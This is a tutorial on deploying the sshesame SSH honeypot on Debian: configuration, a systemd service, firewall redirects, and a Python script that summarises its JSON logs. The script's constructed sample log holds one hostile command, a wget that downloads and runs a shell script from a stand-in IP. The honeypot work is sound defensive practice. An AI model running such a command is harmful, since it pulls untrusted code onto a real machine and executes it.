Set up an SSH honeypot with logging on your Linux server

Setting up a honeypot on your server can be an effective way to monitor, log, and analyze potential attacks, as well as learn about common hacking techniques. By setting up a honeypot, you can create a bait system that attracts attackers, tracks their activities, and provides valuable insights into their methods—all without compromising your real systems. In this guide, we’ll configure a simple SSH honeypot on a Debian server using sshesame, a lightweight tool that emulates an SSH service and captures login attempts.

What is a Honeypot?

A honeypot is a decoy system designed to look like a legitimate target to potential attackers. Its main purpose is to attract, log, and analyze unauthorized access attempts. Honeypots can be set up externally, to observe common attack patterns in the wild, or within a secure network, to trigger alerts if an attacker breaches the internal network. Think of it as a “bait server” that logs everything a hacker tries to do, without actually giving them access to sensitive information.

Honeypots can track various actions, like attempted SSH logins, fake HTTP requests, or even interaction with a simulated database. The exact behavior depends on the type of honeypot you deploy:

  • Low-interaction (service-level) honeypots: Simulate a single service (e.g., SSH or HTTP) and log interactions with it. Commands an attacker types are recorded but never executed. sshesame falls into this category.
  • High-interaction honeypots: Emulate a full OS with several services, providing more detailed information on attacker behavior, at the cost of more resources and more risk if the attacker manages to break out of the decoy.

In this guide, I’ll focus on an SSH honeypot using sshesame, which logs SSH connection attempts and can reveal usernames, passwords, and techniques used by attackers.

Pick Your Honeypot Software

Before diving into sshesame, know that there are many different honeypot solutions available. Here are some factors to consider when choosing honeypot software:

  • Complexity: Do you want a simple service honeypot or a fully interactive one?
  • Types of Services: Are you only interested in SSH, or do you want to simulate other services like HTTP, FTP, etc.?
  • Logging Capabilities: How much detail do you want in logs?
  • Resources: Consider CPU, memory, and network bandwidth. Some honeypots can be resource-intensive, especially high-interaction ones.

If you’re interested in exploring other honeypots, check out awesome-honeypots for an extensive list of free open-source solutions.

Install sshesame

While sshesame is available in the Debian package repositories, it’s often outdated. To ensure you have the latest version, I would recommend downloading the binary or using Docker.

At the time of writing, the latest version is v0.0.39, so we’ll use that for this setup. There will probably be a newer version out by the time you read this, so adjust the version in the commands accordingly.

Download the latest binary:

wget https://github.com/jaksi/sshesame/releases/download/v0.0.39/sshesame-linux-amd64
wget https://github.com/jaksi/sshesame/releases/download/v0.0.39/sshesame.yaml

Make the binary executable:

chmod +x sshesame-linux-amd64

Move the files to the correct directories (this and the following steps need root privileges):

mkdir /var/log/sshesame
touch /var/log/sshesame/sshd-honeypot.log
mv sshesame-linux-amd64 /usr/local/bin/sshesame-linux-amd64
mv sshesame.yaml /usr/local/etc/sshesame.yaml

Now let’s configure sshesame by editing its configuration file. Open the sshesame.yaml file and adjust the settings to your needs.

nano /usr/local/etc/sshesame.yaml

Set Up Your Honeypot: Here’s a recommended configuration to make sshesame look appealing to attackers while ensuring logs are comprehensive. The honeypot listens on port 2020; the firewall section below redirects port 22 to it:

server:
  listen_address: 0.0.0.0:2020

  # Fake internal services for handling direct-tcpip channels (`ssh -L`).
  tcpip_services:
    25: SMTP
    80: HTTP
    110: POP3
    587: SMTP
    8080: HTTP

logging:
  file: /var/log/sshesame/sshd-honeypot.log

  # Make activity logs JSON-formatted instead of human readable.
  json: true

  # Include timestamps in the logs.
  timestamps: true

auth:
  # Allow clients to connect without authenticating.
  no_auth: false

  password_auth:
    # Offer password authentication as an authentication option.
    enabled: true
    # Accept all passwords.
    accepted: true

  public_key_auth:
    # Offer public key authentication as an authentication option.
    enabled: true
    # Reject every public key (the fingerprint is still logged); clients then
    # fall back to password authentication, which is what we want to capture.
    accepted: false

ssh_proto:
  # The version identification string to announce in the public handshake.
  version: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
  # Remove the pre-authentication banner (don't announce that this is a honeypot)
  banner:

Since we want to let the service run permanently and not just when we have our terminal open, we will need to create a systemd service:

nano /etc/systemd/system/sshesame.service

Add the following configuration:

[Unit]
Description=SSH honeypot
After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/usr/local/bin/sshesame-linux-amd64 -config /usr/local/etc/sshesame.yaml
Restart=always
# Resource limits, so a flood of connections cannot starve the real services on this host.
MemoryMax=128M
MemoryHigh=64M
MemorySwapMax=0
CPUWeight=20
CPUQuota=20%
IOWeight=20

[Install]
WantedBy=multi-user.target

Enable and Start the Service:

systemctl enable sshesame.service
systemctl start sshesame.service
systemctl status sshesame.service

If everything is set up correctly, sshesame will now automatically start on boot and run in the background. Note that this unit runs as root. Since port 2020 is unprivileged, you can avoid that by creating a dedicated system user, giving it ownership of /var/log/sshesame, and adding a User= line to the [Service] section.

Configure the Firewall

Only expose the honeypot on the default SSH port if you have already moved your real SSH service to a different port, otherwise the redirect below will lock you out of your own server.

If a firewall is active on the server, connections to port 2020 are dropped until you allow them, and nothing reaches the honeypot on port 22 until you redirect that traffic. To expose the honeypot on the standard SSH port (22), add a NAT rule that redirects incoming port 22 to 2020:

For iptables:

iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2020

Check it with iptables -t nat -L PREROUTING -n. This rule is not persistent across reboots; on Debian, install iptables-persistent and run netfilter-persistent save. Also note that PREROUTING only applies to traffic arriving from the network, so test the redirect from another machine (ssh root@your-server); from the server itself use ssh -p 2020 localhost.

For UFW: Add the following block to /etc/ufw/before.rules, above the existing *filter line:

*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2020
COMMIT

Because the redirect happens before filtering, the packets reach UFW's input chain with destination port 2020, so that is the port you need to allow (no rule for port 22 is required). Then reload UFW:

ufw allow 2020/tcp
ufw reload

Happy Logging

With sshesame running, your server is ready to attract and log SSH login attempts. To monitor the logs, you can check the log file we set up earlier:

tail -f /var/log/sshesame/sshd-honeypot.log

This will display live entries as they’re logged, giving you real-time insight into attack attempts. You’ll be able to see usernames, passwords, source IP addresses, and the commands attackers run once they believe they are in. If you notice patterns, such as repeated attempts from the same IP or the same credential lists, you can use this information to harden your real systems, for example by feeding the IPs into your blocklist or checking that none of the captured passwords are in use anywhere you care about.

Since everything is logged in JSON format, you can also use tools such as jq, or a short script, to further process your logs.
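As an added example (not part of sshesame or the original post), here is a small Python script that summarizes a sshesame JSON log: which IPs are knocking, which username/password pairs they try, and what they execute once let in. It assumes sshesame's JSON layout as I understand it, one object per line with "time", "source" (ip:port), "event_type" and an "event" object whose keys depend on the type ("user"/"password"/"accepted" for password_auth, "command" for exec); check one real line from your own log before relying on those names. The sample log lines are constructed, not captured traffic.

```python
"""Summarize a sshesame JSON log (added example, not sshesame's own tooling).

Assumed field names (verify against a real log line):
  {"time": ..., "source": "ip:port", "event_type": ..., "event": {...}}
"""
import json
import sys
from collections import Counter

# Constructed sample lines in the shape sshesame writes; not real traffic.
SAMPLE_LOG = """\
{"time":"2024-05-01T10:00:01Z","source":"203.0.113.5:51234","event_type":"connection","event":{"client_version":"SSH-2.0-libssh_0.9.6"}}
{"time":"2024-05-01T10:00:02Z","source":"203.0.113.5:51234","event_type":"password_auth","event":{"user":"root","password":"123456","accepted":true}}
{"time":"2024-05-01T10:00:03Z","source":"203.0.113.5:51234","event_type":"exec","event":{"channel_id":0,"command":"uname -a"}}
{"time":"2024-05-01T10:00:04Z","source":"203.0.113.5:51234","event_type":"connection_close","event":{}}
{"time":"2024-05-01T10:05:00Z","source":"198.51.100.7:40001","event_type":"password_auth","event":{"user":"admin","password":"admin","accepted":true}}
{"time":"2024-05-01T10:05:01Z","source":"198.51.100.7:40001","event_type":"exec","event":{"channel_id":0,"command":"cd /tmp; wget http://198.51.100.7/x.sh; sh x.sh"}}
{"time":"2024-05-01T10:06:00Z","source":"203.0.113.5:51300","event_type":"password_auth","event":{"user":"root","password":"toor","accepted":true}}
this line is not json and must be skipped
{"time":"2024-05-01T10:07:00Z","source":"203.0.113.5:51301","event_type":"public_key_auth","event":{"user":"git","public_key_fingerprint":"SHA256:abc","accepted":false}}
"""

AUTH_EVENTS = {"password_auth", "public_key_auth", "keyboard_interactive_auth", "no_auth"}


def parse_log(text):
    """Yield parsed entries, skipping blank or malformed lines: a half-written
    line during `tail -f` or a crash must not abort the whole analysis."""
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if isinstance(entry, dict) and "event_type" in entry:
            yield entry


def source_ip(entry):
    """Strip the ephemeral port from "ip:port"; also handles "[v6addr]:port"."""
    src = entry.get("source", "")
    return src.rsplit(":", 1)[0].strip("[]")


def summarize(text):
    """Return the counters a defender acts on: login attempts per source IP,
    credential pairs tried, and commands executed in the fake shell."""
    attempts, creds, commands = Counter(), Counter(), Counter()
    for entry in parse_log(text):
        etype = entry["event_type"]
        event = entry.get("event") or {}
        if etype in AUTH_EVENTS:
            attempts[source_ip(entry)] += 1
        if etype == "password_auth":
            creds[(event.get("user"), event.get("password"))] += 1
        elif etype == "exec":
            commands[event.get("command", "")] += 1
    return {"attempts": attempts, "creds": creds, "commands": commands}


def top(counter, n=5):
    """Most common n entries of a counter as (value, count) pairs."""
    return counter.most_common(n)


if __name__ == "__main__":
    # Usage: python3 summarize.py /var/log/sshesame/sshd-honeypot.log
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    s = summarize(text)
    print("Login attempts per IP:", top(s["attempts"]))
    print("Credentials tried:   ", top(s["creds"]))
    print("Commands executed:   ", top(s["commands"]))
```

Run it against the live log file to get a quick picture of who is scanning you and with which credential lists; the exec counter is usually the most interesting part, since it shows the download-and-run one-liners bots use after a successful login.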